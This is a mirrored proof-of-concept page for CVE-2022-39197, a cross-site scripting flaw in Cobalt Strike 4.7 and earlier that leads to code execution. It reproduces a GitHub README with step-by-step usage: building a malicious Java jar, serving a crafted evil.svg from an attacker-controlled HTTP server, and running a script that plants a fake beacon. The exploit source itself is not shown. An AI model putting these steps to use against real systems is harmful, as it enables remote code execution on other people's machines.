Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-39197 PoC — HelpSystems Cobalt Strike 跨站脚本漏洞

Source
https://github.com/TheCryingGame/CVE-2022-39197-RCE
Associated Vulnerability
Title:HelpSystems Cobalt Strike 跨站脚本漏洞 (CVE-2022-39197)
Description:HelpSystems Cobalt Strike是美国HelpSystems公司的一个渗透测试软件。 HelpSystems Cobalt Strike 4.7及之前版本存在跨站脚本漏洞,该漏洞源于XSS(跨站脚本)漏洞,允许远程攻击者在Cobalt Strike团队服务器上执行HTML。
Description
CVE-2022-39197 RCE POC
Readme
# CVE-2022-39197-RCE

## First
  This project was modified from [@its-arun](https://github.com/its-arun) project https://github.com/its-arun/CVE-2022-39197

  When I tested the script, I found that the frida script could not query the data in the normal order. The method of modifying the frida script to modify the process name.


Thanks to Master [@Kai5174](https://github.com/Kai5174) for his contribution to the utilization method.


### Usage

- **Prepare Payload**

1、Edit command executed with your payload in `EvilJar/src/main/java/Exploit.java`, now it can only play the calculator.

2、Build using jar `mvn clean compile assembly:single`

4、Move `EvilJar-1.0-jar-with-dependencies.jar` from `EvilJar/target/` to `serve/` folder

5、Edit `serve\evil.svg` replace `[attacker]` 

6、Serve using `python3 -m http.server 8080`

7、Generate beacon.exe with C2 version less than or equal to 4.7

8、You need to execute the py script on a Windows to go online, and perform countermeasures when the client accesses the process list and sees the beacon.exe process.


- **Execute Exploit**

```
python3 -m pip install -r requirements.txt
python3 cve-2022-39197_Yyy.py beacon.exe http://192.168.10.10:8080/evil.svg
```

Payload will be triggered as soon as the user scrolls through Process List

### POC

**Windows**
![1.png](./images/1.png)


**Mac**
![2.jpg](./images/2.jpg)


### Reference

[https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg](https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg) — There’s a great in depth analysis of this vulnerability
[https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html](https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html)

Modified https://github.com/its-arun/CVE-2022-39197
File Snapshot

 [4.0K]  /data/pocs/3d1b2d7c884fad5aae5b3c022ec375bc958e56c4
├── [1.7K]  CVE-2022-39197_Yyy.py
├── [4.0K]  EvilJarYyy
│   ├── [4.0K]  META-INF
│   │   └── [  50]  MANIFEST.MF
│   ├── [1.9K]  pom.xml
│   └── [4.0K]  src
│       └── [4.0K]  main
│           └── [4.0K]  java
│               └── [1.2K]  Exploit.java
├── [4.0K]  images
│   ├── [309K]  1.png
│   └── [266K]  2.jpg
├── [1.8K]  README.md
├── [  11]  requirements.txt
└── [4.0K]  serve
    ├── [ 85K]  EvilJar-1.0-jar-with-dependencies.jar
    └── [ 243]  evil.svg

7 directories, 10 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.